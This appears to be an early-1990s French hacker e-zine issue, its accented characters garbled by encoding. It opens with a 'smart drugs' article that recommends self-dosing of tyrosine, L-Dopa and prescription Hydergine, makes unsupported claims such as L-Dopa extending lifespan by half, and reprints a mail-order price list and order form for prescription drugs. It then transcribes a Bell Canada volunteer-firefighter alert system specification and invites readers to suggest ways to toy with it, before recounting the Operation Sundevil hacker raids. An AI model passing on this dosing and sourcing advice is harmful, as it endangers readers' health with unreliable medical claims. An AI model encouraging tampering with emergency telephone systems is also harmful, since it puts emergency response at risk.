produit de l'ac‚tylcholine … partir de la choline pr‚sente dans
les aliments (entre autres le poisson) et de la l‚cithine (sous
forme de choline phosphatidyle). Pour que la choline soit
transform‚e en ac‚tylcholine, nous devons fournir des quantit‚s
abondantes de vitamines B5 (Pantoth‚nate de calcium ou acide
pantoth‚nique). Attention, le bitartre de choline, la forme la
plus r‚pandue de choline, peut donner la diarrh‚e. Les doses
recommand‚es de choline phosphatidyle pour obtenir une
am‚lioration aux niveaux mn‚monique, cognitif et autres, sont
de 3 … 5 grammes chaque jour, et pour obtenir les mˆmes r‚sultats
avec de la l‚cithine, les doses doivent ˆtre de 80 grammes chaque
jour (d‚pendemment du pourcentage de choline contenu dans la l‚cithine).
Les r‚sultats devraient ˆtre per‡us au bout de quelques
jours. Par contre, la choline pr‚sente quelques inconv‚nients
pour certains (surtout quand la l‚cithine est rance), car les bact‚ries
dans l'appareil intestinal la transforment parfois en une substance …
odeur de poisson assez d‚sagr‚able appel‚e trimethylamine. Cependant,
vous pouvez vous en d‚barrasser en modifiant les bact‚ries de vos
intestins par l'ingestion de yogourt, de fibres alimentaires
suppl‚mentaires et de suppl‚ments de vitamines.

Le l‚vart‚r‚nol, appel‚ aussi nor‚pin‚phrine (NE), est un autre
neurotransmetteur du cerveau qui joue un r“le important au
niveau de l'instinct et des ‚motions, telles les pulsions sexuelles, de
la m‚moire et de l'aptitude … apprendre. Le cerveau produit du
l‚vart‚r‚nol … partir de la ph‚nylalanine et de la tyrosine, des acides
amin‚s pr‚sents dans la viande, les oeufs, et le fromage, entre autres.
La ph‚nylalanine aide notre cerveau … remplacer le NE manquant. Lorsqu'on
se sent ®vid‚¯ mentalement, c'est peut-ˆtre parce qu'on a ‚puis‚ les
r‚serves de NE et que le cerveau ne parvient pas … les remplacer. On peut
bel et bien ®refaire le plein¯ avec celle-ci. Pour que la transformation
de tyrosine et de ph‚nylalanine en NE aie bien lieu, nous devons fournir
en quantit‚ abondante des vitamines C et B6. Les doses
recommand‚es pour obtenir de bons r‚sultats varient de 100 … 1000
mg par jour, pendant deux semaines. On obtient de meilleurs
r‚sultats si celui-ci est pris … jeun, le soir avant de se
coucher, ou dŠs son r‚veil le matin. Toutefois, la tyrosine
pourrait agir sur la pression art‚rielle, provoquant
l'hypertension chez les uns et l'hypotension chez les autres.
MISE EN GARDE: Les individus prenant les puissant inhibiteurs MAO
ne devrait pas prendre, ni de la ph‚nylalanine, ni de la tyrosine.

La dopamine est un autre important neurotransmetteur qui commande
aussi l'instinct sexuel et d'autres ‚motions, le mouvement
corporel, la facult‚ des tissus de croŒtre, de se r‚parer, le
systŠme immunitaire et l'humeur. Le systŠme dopaminergique est
l'un des systŠmes qui d‚cline le plus sous l'effet du
vieillissement. La lipofuscine, pigment de vieillissement, de la
mˆme substance que les taches de vieillissement cutan‚es, se
forme trŠs rapidement avec l'ƒge dans les systŠmes dont le
fonctionnement d‚pendent de la dopamine. La L-Dopa, acide amin‚ …
partir duquel le cerveau fabrique la dopamine, permet d'augmenter
la dur‚e de vie chez les animaux en laboratoire d'environ 50 pour
cent. La L-Dopa est un excellent antioxydant, ‚tant un cat‚chol, et
a ‚t‚ utilis‚ comme protection contre les radiations … haute
‚nergie. Pour ‚viter de fƒcheuses cons‚quences, on l'emploie avec
les ‚l‚ments antioxydants tel que: Vitamine E, C, B1, B5, Zinc,
S‚l‚nium, et de l'Hydergine).

MISE EN GARDE: L'usage de la L-Dopa, ph‚nylalanine ou de la
tyrosine en doses importantes peut, toutefois, acc‚l‚rer la
croissance d'un m‚lanome pigment‚ malin d‚j… existant.

Voila pour ce qui est des neurotransmetteurs. Maintenant, voici
la deuxiŠme partie qui sera consacr‚ … l'Hydergine (de Sandoz).


II- L'Hydergine

L'Hydergine (de Sandoz) est un m‚dicament d'ordonnance apte …
r‚tablir le fonctionnement c‚r‚bral chez des personnes ƒg‚es
souffrant de s‚nilit‚ … des degr‚s plus ou moins ‚lev‚s, ou …
am‚liorer la fonction c‚r‚brale chez les sujets humains normaux.
Administr‚e en doses quotidiennes de 12 mg pendant seulement deux
semaines, l'Hydergine a provoqu‚ une am‚lioration de la
vigilance ‚l‚mentaire et de la fonction cognitive sup‚rieure chez
des sujets volontaires normaux.

Il agit aussi comme remontant, un peu comme la caf‚ine, sans ses
effets secondaires sur l'humeur et les nerfs. En outre,
l'Hydergine stimule la production d'axones par le cerveau, liens
qui permettent aux neurones de communiquer entre eux et dont on a
besoin pour apprendre. Ce m‚dicament est trŠs renomm‚ parce
qu'il permet d'accroŒtre notre intelligence et ensuite parce
qu'il retarde jusqu'… quatre fois l'accumulation de lipofuscine
dans les cellules c‚r‚brales. Il agit aussi sur les systŠmes
nerveux noradr‚nergique (NE) et dopaminergique du cerveau. Le
systŠme dopaminergique est reli‚ aux ‚motions, … la motivation,
aux activit‚s autonomes du tronc c‚r‚bral, aux pulsions propres …
l'ambition et … l'agressivit‚, … la faim et au manger, … la
pulsion sexuelle, … l'instinct du territoire, … l'activit‚
motrice et … la stimulation de la s‚cr‚tion d'hormones, comme
l'hormone somatotrope ou de croissance.

Le facteur naturel de croissance hormonale (FNC) du cerveau et
l'Hydergine semblent emprunter le mˆme cheminement biochimique
pour provoquer la croissance des axones.

Un traitement … base d'Hydergine exige quotidiennement environ de
12 … 20 mg pour un minimum de six mois … deux ans pour r‚g‚n‚rer
les axones de fa‡ons … r‚aliser une am‚lioration optimale des
fonctions mentales. Cependant, un petit conseil, si vous aimeriez
suivre ce traitement, je vous recommande de prendre de
l'Hydergine sublinguale. Voici pourquoi: Si vous prenez de
l'Hydergine par voie buccale, vous en perdez 20 pour cent qui
sont ‚limin‚s dans les excr‚ments, le foie d‚truisant ensuite 40
pour cent, ce qui n'en laisse que 40 pour cent pour le reste du
corps, dont le cerveau. Par contre, administr‚e sous forme
sublinguale, l'Hydergine est fournie au cerveau en quantit‚
beaucoup plus abondante. Il serait sage cependant de commencer le
traitement avec de faibles doses au d‚but, pour ‚viter les maux de tˆtes.

L'Hydergine peut aussi ˆtre utile pour traiter l'hypoglyc‚mie par
son action stabilisatrice sur la r‚action du cerveau … l'apport
d'‚nergie, le cerveau ‚tant la partie du corps la plus sensible …
l'abaissement du taux sanguin du glucose.

P.S. Voici maintenant la liste des produits d'Interlab ainsi que
les prix. Et dire qu'on fait ‡… gratuitement...


- ADRAFINIL 40 X 300 MG TABLETS $32.00
120 X 300 MG TABLETS $115.00

- AMPHOTERICIN (ORAL) 40 X 250 MG CAPSULES $24.00
160 X 250 MG CAPSULES $85.00

- ARCALION (SULBUTIAMINE) 30 X 200 MG TABLETS $19.00
130 X 200 MG TABLETS $69.00

- BIOSTIM 8 X 1 MG TABLETS $12.00
32 X 1 MG TABLETS $42.00

- CENTROPHENOXINE 60 X 250 MG TABLETS $20.00
240 X 250 MG TABLETS $64.00

- DHEA 90 X 50 MG CAPSULES $26.00
360 X 50 MG CAPSULES $95.00

- DEPRENYL 100 X 2.5 MG TABLETS $38.00
300 X 2.5 MG TABLETS $96.00

- DEPRENYL 100 X 5 MG TABLETS $70.00
300 X 5 MG TABLETS $180.00

- ETHOXYQUIN 100 X 50 MG CAPSULES $18.00
400 X 50 MG CAPSULES $62.00

- FENOZONOLE (ORDINATOR) 30 X 10 MG TABLETS $14.00
120 X 10 MG TABLETS $50.00

- FIPEXIDE (VIGILATOR) 30 X 200 MG TABLETS $19.00
120 X 200 MG TABLETS $70.00

- FLUCONAZOLE 1 X 150 MG CAPSULE $22.00
7 X 50 MG CAPSULES $51.00

- HYDERGINE ORAL 100 X 5 MG TABLETS $36.00
400 X 5 MG TABLETS $130.00

- HYDERGINE SUBLINGUAL 100 X 4.5 MG TABLETS $32.00
400 X 4.5 MG TABLETS $115.00

- IDEBENONE (AVAN) 10 X 30 MG TABLETS $42.00
40 X 30 MG TABLETS $150.00

- KH3 (PROCAINE) 100 X 50 MG TABLETS $12.00
400 X 50 MG TABLETS $45.00

- L-DOPA (SINEMET) 100 X 110 MG TABLETS $29.00

- MELATONIN 100 X 3 MG CAPSULES $24.00
400 X 3 MG CAPSULES $86.00

- MINAPRINE (CANTOR) 30 X 100 MG TABLETS $30.00
120 X 100 MG TABLETS $108.00

- PARLODEL (BROMOCRYPTINE) 30 X 2.5 MG TABLETS $22.00

- PIRACETAM 60 X 800 MG TABLETS $18.00
240 X 800 MG TABLETS $64.00

- PHENYTOIN 250 X 100 MG TABLETS $12.00
1000 X 100 MG TABLETS $44.00

- PROPRANOLOL 500 X 10 MG TABLETS $16.00

- RETIN A/EFFEDERM 0.05% 30 GRAM TUBE $9.00
4 X 30 GRAM TUBES $32.00

- RETIN A 0.01% 15 GRAM TUBE $9.00
4 X 15 GRAM TUBES $32.00

- RIBAVIRIN (VIRAZOLE) 10 X 100 MG CAPSULES $48.00
40 X 100 MG CAPSULES $172.00

- ROXITHROMYCINE 10 X 150 MG TABLETS $32.00

- VASOPRESSIN NASAL SPRAY 12 ML BOTTLE $32.00
4 X 12 ML BOTTLES $112.00

- VINPOCENTINE 90 X 5 MG TABLETS $32.00
360 X 5 MG TABLETS $115.00

- XANTHINOL NICOTINATE 90 X 300 MG CAPSULES $14.00
360 X 300 MG CAPSULES $48.00

- ZOVIRAX CREAM 5% 2 GRAM TUBE $17.00
4 X 2 GRAM TUBES $60.00


P.S. "ALL PRICES ARE US DOLLARS AND PAYMENT IS ONLY ACCEPTED IN US
DOLLARS"

Pour conclure cet article, je vais vous donner l'adresse d'Interlab au
cas ou vous auriez envie de commencer un traitement … l'Hydergine...

INTERLAB
BCM BOX 5890
LONDRES, WC1N 3XX
ANGLETERRE

Voici aussi un exemple de bon de commande:

PRODUCT PRICE QTY AMOUNT

PIRACETAM 60 X 800 MG TABLETS $18.00 2 $36.00
...

SUB TOTAL $ 36.00

- AIR MAIL POST ADD SHIPPING $10.00 OR
ACCELERATED AIR MAIL POST ADD $15.00 (LES PRIX SONT ENCORE EN
DOLLARS US)

- PLEASE NOTE: ADD ONE ONLY OF THE POSTAL CHARGE AS REQUIRED,
FAILURE TO ADD EITHER SHIPPING CHARGE WILL RESULT IN GOODS BEING
SENT VIA SURFACE MAIL, APPROXIMATELY 10 WEEKS DELIVERY TIME

TOTAL AMOUT ENCLOSED $ 36.00 (+ SHIPPING CHARGE)

MAKE CHECK AND MONEY ORDERS PAYABLE TO INTERLAB
ALL PRODUCTS SUPPLIED TO OUR STANDARD TERMS AND CONDITIONS,
AVAILABLE ON YOUR WRITTEN REQUEST.

MAIL YOUR ORDER TO:

INTERLAB, BCM BOX 5890, LONDON, WC1N 3XX, ENGLAND.

PLEASE SEND MY ORDER TO THE FOLLOWING: (PLEASE PRINT CLEARLY)

NAME: _______________________________
ADDRESS: __________________________________________________
__________________________________________________
ZIP/POST CODE: ____________
COUNTRY: __________________

THE SECTION BELOW MUST BE COMPLETED AND SIGNED IN ORDER THAT WE
CAN SHIP YOUR ORDER;

PLEASE CHECK - HAVE YOU FILLED IN THE NAME AND ADDRESS SECTION
CORRECTLY ?

I HEREBY DECLARE THAT THESE PRODUCTS ARE FOR MY OWN USE AND NOT
FOR COMMERCIAL RESALE. FURTHER, I DECLARE THAT THIS SUPPLY DOES
NOT EXCEED THREE MONTHS USAGE AND THAT NO THERAPEUTIC CLAIMS HAVE
BEEN MADE TO ME BY THE SUPPLIER, I HAVE DISCUSSED THE USE OF
THESE ITEMS WITH A PHYSICIAN.


Et on continue la semaine prochaine, toujours avec Coaxial Karma,
toujours avec les smart drugs...



BOUM! QUAND VOTRE MOTEUR FAIT BOUM! LA DPANNEUSE SIMOUN!



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

LES MEDICAMENTS ANTI-SENILITE SONT INTERDITS CHEZ NOUS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ




NOUVEAU SYSTEME DU BELL POUR LES POMPIERS VOLONTAIRES

par
Blitzkreig


Une fois de plus, Northern Phun Co. tient … remercier Bell Canada pour
sa contribution (bien involontaire) … l'‚dification des masses... Un seul
hic, cependant, messieurs du Bell qui, d'aventure, liriez ces lignes:
vous ne pourriez-pas laisser traŒner dans vos poubelles des versions Word
Perfect de vos documents sur disquette? Ca nous ‚viterait une grosse job
de retranscription. Merci! Et, en passant, nous ne corrigerons pas toutes
les fautes de fran‡ais dans vos documents. Alors, si vous voulez avoir
l'air un peu moins twits, corrigez-les avant de les jeter...

Bon, ceci pos‚, nous avons donc d‚couvert, … d‚faut du nouveau systŠme
911, un petit quelque chose que le Bell concocte pour les cas d'urgence.
Si vous ˆtes un phreaker digne de ce nom, cette information ne sera pas
sans vous int‚resser... Nous sommes tous curieux de connaŒtre le
fonctionnement de Bell dans ses moindres d‚tails, non?

OK... Prenons le projet suivant:

POMPIERS VOLONTAIRES

DEVIS RELATIF A UNE DEMANDE DE FOURNITURE D'UN
SYSTEME D'APPEL TELEPHONIQUE DE POMPIERS
VOLONTAIRES DESTINE AUX PETITES ET MOYENNES
MUNICIPALITS


1- HISTORIQUE
Bell canada offre depuis une vingtaine d'ann‚es un service d'appels aux
pompiers volontaires destin‚ aux petites municipalit‚s du milieu rural.
Ce systŠme permet d'intercepter la ligne priv‚e des pompiers volontaires
et d'y appliquer une sonnerie sp‚ciale et facilement identifiable.
Lorsque les pompiers r‚pondent, le pr‚pos‚ peut communiquer directement
avec eux … l'aide du combin‚ de la console.
Au d‚but, Bell contr“lait assez bien le nombre d'appareils t‚l‚phoniques
install‚s chez ses abonn‚s, ce qui n'est plus le cas aujourd'hui. De
plus, les municipalit‚s ont vu leur population grandir et ont donc d–
accroŒtre le nombre de leurs pompiers volontaires.
Mˆme que dans certains cas, le co–t maintenant exorbitant d'une escouade
de pompiers permanents, a forc‚ plusieurs grandes municipalit‚s … lui
joindre un groupe de pompiers volontaires parfois imposant.
Tous ces facteurs, plus prenant en compte la d‚su‚tude du systŠme
existant, nous conduit … regarder la possibilit‚ d'en construire un
autre, mieux adapt‚ aux besoins de notre temps.
Un systŠme qui utilisant une technologie moderne, sera plus fiable et
donc s‚curisant pour tout le monde.

2-DESCRIPTION DES COMPOSANTES

Le systŠme se divise en trois parties:
1) La console de contr“le ‚quip‚e d'un combin‚ VLN, qui est install‚e
chez le client.

2) Les ponts de conf‚rences install‚s dans le central t‚l‚phonique.

3) Les circuits de contr“le (d‚codeur de tonalit‚s, circuits
d'interception et de sonnerie)

Une description d‚taill‚e de l'op‚ration de ces trois ‚l‚ments, est
pr‚cis‚e aux pages suivantes de ce document.

2.1- LA CONSOLE

La console devra avoir une allure moderne et ˆtre r‚sistante. Ses boutons
de contr“le devront ˆtre de bonne qualit‚ et ‚quip‚s d'un (LED pourpre).
Ce "LED", lors d'un appel initi‚ en poussant le bouton sur lequel il est
mont‚, devra clignoter tant et aussi longtemps que le pompier rattach‚ au
dit bouton n'aura pas r‚pondu. Subs‚quemment lorsqu'il aura r‚pondu, le
"LED" s'illuminera en permanence. Ainsi le pr‚pos‚ pourra facilement
garder la liste des appels t‚l‚phoniques des pompiers qui ont ‚t‚
d‚croch‚s pour r‚pondre … l'appel. Un bouton de relƒchement permettra de
r‚g‚n‚rer le systŠme jusqu'… la prochaine intervention. Tous les LED's
seront alors ‚teints … l'exception de celui qui t‚moigne de la
disponibilit‚ de la console. Il s'agit ici de la seule op‚ration qui
permette d'‚teindre les LED's. Autrement dit, la condition des appels
r‚pondus et non r‚pondus devra demeurer tant et aussi longtemps que ce
bouton n'aura pas ‚t‚ pouss‚. S'il n'y a pas de contrainte technique pour
le nombre de pompiers possibles, il y aura cinquante boutons pour
cinquante pompiers. Si non, il y aura autant de boutons que le nombre
maximum de pompiers.

Cinq boutons additionnels permettront de regrouper chacun, dix pompiers
repr‚sent‚s a la console pour un total de cinquante pompiers. (toujours
si aucune contrainte technique n'existe quand au nombre.). L'association
des dix pompiers … chacun des cinq boutons d,appel par groupe, devra ˆtre
facilement programmable par le pr‚pose du client. Il pourra ainsi
s'organiser lui-mˆme, chacun de ses cinq groupes de pompiers volontaires.
Afin de fournir un compte-rendu des appels par groupes, les appels par
groupes g‚nŠreront la mˆme op‚ration des LED's sur chacun des boutons
associ‚s … chacun des pompiers. (appels r‚pondus et non r‚pondus)

Un bouton d'appel g‚n‚ral devra aussi ˆtre pr‚vu. Celui-ci permettra
d'appeler tous les pompiers rattach‚s … la console sur la simple pression
de ce bouton. Les LED's de chacun des pompiers donneront l… aussi, le
compte-rendu des appels r‚pondus.

La console sera ‚quip‚e d'un combin‚ de type VLN (combin‚ pour durs
d'oreille).

2.2- LES PONTS DE CONFRENCE

Les ponts de conf‚rences devront ˆtre contr“l‚s afin de ne permettre
aucune perte r‚sultante totale … leur sortie, sup‚rieure a -15 dbm. (ref
600 Ohms .001 A) i.e. si la puissance d'entr‚e au pont est de -4 db, la
perte totale g‚n‚r‚e par le pont sera ‚gale ou inf‚rieure … 11 db.

Si la d‚cision est prise d'utiliser un contr“le de direction par
d‚tection de la voix, il faut s'assurer de donner la priorit‚ … la
console. Autrement, si le niveau de bruit chez un pompier volontaire
s'av‚rait ‚lev‚, le systŠme deviendrait inutilisable.

Les ponts et leur circuiterie adjacente, seront mont‚s sur des circuits
enfichables de type utilis‚ couramment dans les bureaux centraux de Bell
Canada.

2.3- LES INTERFACES DE CONTRþLE

Les interfaces de contr“le devront ˆtre mont‚es sur des cartes de type
enfichables utilis‚es couramment dans les centraux de Bell Canada.

Elles devront tenir compte du concept (CNCA) (carrier non-compatible
application) dont la fourniture ne sera plus garantie aprŠs le 30 avril
1993. Donc il ne faut compter sur aucun lien m‚tallique de bout en bout.
IL FAUT QUE TOUS LES SIGNAUX UTILISES PAR LE SYSTEME, SOIENT "CARRIER
COMPATIBLE".

Ces interfaces pourront puiser … mˆme l'alimentation d'urgence du central
(-48v et 110v 20 hertz) Le -48v ‚tant seulement pr‚filtr‚ pour les
besoins de la t‚l‚phonie, un r‚gulateur int‚gr‚ aux systŠme devra ˆtre
pr‚vu dans le circuit d'alimentation de celui-ci.

Ces interfaces devront permettre l'op‚ration de la console, tel que
d‚crit au paragraphe traitant de LA CONSOLE.

Elles auront … transf‚rer la ligne de l'abonn‚ vers le systŠme de pompier
volontaire.
Deux cas sont alors possibles:

a) LA LIGNE DU POMPIER EST RACCROCHE.

L'interface transfert la ligne de l'abonn‚ vers le systŠme de pompiers et
la branche sur la sonnerie du central. Cette sonnerie ne doit pas ˆtre
entendue par la console afin de permettre la diffusion du message aux
pompiers qui ont d‚j… r‚pondu. Lorsque le pompier r‚pond … sa ligne, il
doit ˆtre automatiquement branch‚ sur le port de conf‚rence de fa‡on … ce
qu'il puisse lui aussi recevoir le message d'incendie.

b) LA LIGNE DU POMPIER EST DCROCHE.

L'interface ‚met une tonalit‚ forte sur la ligne du pompier volontaire et
15 secondes plus tard, transfert la ligne automatiquement sur le pont de
conf‚rence des pompiers volontaires.

OPTIONNEL

Le pompier peut empˆcher le transfert de sa ligne au systŠme de pompiers
volontaires, en appuyant sur la touche "5" de son clavier "touch tone" en
de‡a du 1 secondes. (option utile si une autre personne utilise le
t‚l‚phone personnel du pompier et que celui-ci n'est pas … la maison.)

le pompier peut empˆcher le transfert de sa ligne au systŠme de pompiers
volontaires, en donnant une impulsion sur le crochet du commutateur.
(link ou flash hook)

POMPIERS DISTANTS

Le systŠme devra pr‚voir, la possibilit‚ d'inclure des pompiers qui ne
sont pas desservis par le mˆme central t‚l‚phonique que la console.

2.4- POINT DE SCURIT

Il est de plus trŠs important qu'une forme de dialogue s'‚tablisse
p‚riodiquement entre la console et les cartes de contr“le. Cela de fa‡on
… v‚rifier la continuit‚ du service du circuit t‚l‚phonique. Afin
d'assurer une relŠve en cas de panne du dit circuit, les cartes devront
pouvoir s'accommoder d'une autre ligne t‚l‚phonique comme circuit
alternatif. Le transfert d'utilisation de circuit devra ˆtre assur‚ par
la carte ou les cartes de contr“le.

3- CARACTRISTIQUES

Ce nouvel ‚quipement devra remplacer ad‚quatement le systŠme existant, en
tenant compte des contraintes et des disponibilit‚s techniques modernes.

La fourniture des diff‚rentes piŠces devra ˆtre garantie pour une p‚riode
sup‚rieure … dix ann‚es. Durant cette p‚riode de temps, il est entendu
que Bell Canada s'attend … ce qu'un support technique complet et efficace
soit disponible rapidement. Si des sous-contrats sont accord‚s pour
assurer la fabrication de diff‚rentes piŠces d'‚quipement, il deviendra
la responsabilit‚ du soumissionnaire d'en assurer l'approvisionnement et
la qualit‚.

Des d‚lais de livraison raisonnables devront ˆtre sp‚cifi‚s tant pour le
nouvel ‚quipement que pour les piŠces de secours command‚es
subs‚quemment.

La compagnie Bell Canada, s'approprie l'exclusivit‚ du concept et devra
contr“ler elle-mˆme le partage de celui-ci avec les autres compagnies
t‚l‚phoniques. Le fournisseur s'engage donc, … aviser Bell canada de
toutes les demandes relatives au produit en provenance d'autres
compagnies.

La compagnie Bell Canada, se r‚serve en tout temps le droit de faire
fabriquer le produit par d'autres fournisseurs si elle le juge
n‚cessaire. Donc, aucun droit particulier ne sera accord‚ tant qua la
fourniture de celui-ci.

(Fin de la transcription...)

Je vous ‚pargne le reste des conneries contenues dans ce document...
J'espŠre que le bout o— "Bell s'approprie l'exclusivit‚" vous a fait rire
autant que moi...

De quelle maniŠre pourrait-on s'amuser avec ce nouveau joujou? J'attends
vos suggestions...



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

UTILISEZ BELL, Y'A PAS LE FEU!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



-+( ThE CYbErPuNk BuSt )+-
Part I

Writer: l0gRuS!

On nous accuse, nous officiers et collabos de NpC, de ne montrer
que les beaux et roses c“t‚s du Hack/Phreak...

Ah ouin?

01/03/90, Austin (Texas). Erik Bloodaxe (handle) est r‚veill‚ par
un revolver de police point‚ vers sa tˆte. Bloodaxe ‚tait CSO du
Phoenix Project ([512] Tx) et un membre avou‚ de Legion of Doom
(LoD)...

L'un des busts les plus publicis‚s et controvers‚s de l'histoire du
hack s'‚tait mis en branle, Op‚ration SunDevil, le CyberPunk Bust.
Pourquoi CyberPunk? You'll see..

Bloodaxe (les hackers ne sont pas cons, c'est bien connu) avait
auparavant cach‚ son meilleur ‚quipement ailleurs. Les agents des
Secret Services am‚ricains (USSS, ou SS) sont donc repartis avec un
terminal 300 Bauds, le code-source du Worm Internet de R.Morris, son
t‚l‚phone, et tout ce qu'il y avait d'‚lectronique dans la maison. Ils se
sont mˆme essay‚s pour le Pac-Man en version Arcade mais il ‚tait trop
lourd, alors..

Meanwhile...

Six agents des SS, un flic d'Austin et Henry Kluepfel (Who the
fuck is he? Tout ce que je sais, c'est que ce mec est
responsable d'un bon pourcentage des busts et des raids de pirates
aux States. Le genre qu'on voudrait pas voir … Qu‚bec quoi..)
p‚nŠtrent dans la chambre … coucher de The Mentor, les surprenant
lui et sa femme en sous-vˆtements. The Mentor n'‚tait vraiment pas
prˆt au bust (Errare Humanum Est).. Sont all‚s dans les poches de
l'tat:

Un IBM AT clone avec 4Mgs RAM et un HD de 120Mgs.
Une Imprimante Laserjet ][.
Un SystŠme d'exploitation SCO-XENIX 286, tout … fait l‚gitime.
Des disks de PageMaker et Microsoft Word
La thŠse d'Universit‚ de la blonde de Mentor.
Le t‚l‚phone familial, etc..

La 3Šme Phase du CyberPunk se pr‚parait, la finale quoi.. Mais
avant, qui ‚tait donc ce Mentor?
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

Nom: Unknown
Handle: The Mentor Age:????
Organisations: LoD, Phrack [Writer] Status: Mari‚
SysOp de: -Phoenix Project
-Illuminati Bbs [412] 447-4449
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


Mmmm.. On sait … propos de Phoenix Project mais.. Qu'est donc ce
Illuminati Bbs?

The Mentor ‚tait ‚diteur en chef et concepteur de jeu … la
compagnie Steve Jackson Games (SJG). Oui oui, le mˆme Steve Jackson
qui vous … fait tripper avec ses "Livres-dont-vous-ˆtes-le-H‚ros"
qnand vous ‚tiez m“mes. Ce mˆme Steve Jackson s'est plus tard parti
une compagnie de Jeux de R“les (Eh oui! Encore!), ayant comme
produit principal GURPS (Generic Universal Role-Playing System). Le
but de GURPS ‚tait de cr‚er un jeu de r“le polyvalent, o— on
pourrait par la suite y greffer tous les mondes et toutes les
‚poques possibles et inimaginables...

Il y eu donc GURPS Fantasy, pour jouer … l'‚poque des chevaliers,
GURPS Special Ops, pour aller dans la peau de votre espion favori,
GURPS Space, pour voyager aux confins de l'univers..

Puis il y a eu GURPS Illuminati. Le monde de Jeu Illuminati ‚tait
un monde paranoiaque, ou les joueurs dirigeaient de sombres
organisations convoitant la domination de la planŠte. Illuminati
donnait aux joueurs le pouvoir sur le CIA, le KGB, le Ku Klux Klan,
les Scouts, la compagnie de t‚l‚phone.. En gros Illuminati ‚tait la
plus grosse entreprise jamais con‡ue, dans un territoire jamais
explor‚...

Bien vite, Illuminati d‚teignit sur la compagnie au complet, et on
voyait des pyramides munies d'un oeil suivant les signatures des
‚crivains, le mˆme symbole ‚nigmatique au sommet des rapports de
nouveaux produits, et un peu partout dans leur magazine RolePlayer.
SJG s'‚tait donc imbib‚ de cette athmosphŠre de mystŠre. Il ‚tait
donc normal que, quand on prit la d‚cision d'ouvrir un Bbs … la
compagnie, pour r‚pondre aux questions des joueurs et pour animer
des discussions sur le sujet, Illuminati Bbs fut adopt‚ comme nom.
Et qui fut le 1er (et le plus qualifi‚) … s'offrir comme SO? The
Mentor..

Naturellement, rien d'ill‚gal ne se passait sur Illuminati. Mˆme
pas une copie de Phrack, meme pas un NpC (Ha!), rien. Quelques
membres de LoD s'y retrouvaient, ‡a oui, mais c'‚tait uniquement
pour parler de leurs int‚rˆts Jeux-De-Rolesques, et rien d'autre..

Mais, me direz-vous, que vient faire ce Bbs dans toute
l'histoire???

TrŠs simple: Il servira d'alibi pour le bust de Steve Jackson
Games. Mais revenons … notre histoire, justement...

Les agents des SS se pr‚paraient … d‚foncer la porte du modeste
building de SJG lorsque Mentor leur offrit la clef, sachant qu'il
est inutile de scrapper une porte pour rien. Les agents ont p‚n‚-
tr‚ dans l'immeuble, alors que personne encore n'‚tait arriv‚ au
boulot, et sont repartis avec trois ordinateurs, plusieurs HD, deux
moniteurs, trois modems, une imprimante laser, tous les fichiers,
E-Mail et T-files du Illuminati Bbs et le manuscrit du Suppl‚ment
GURPS CyberPunk.

GURPS CyberPunk.. Le dernier n‚ de la compagnie. Un monde de jeu
pour GURPS se situant dans les environs des ann‚es 2050, un monde
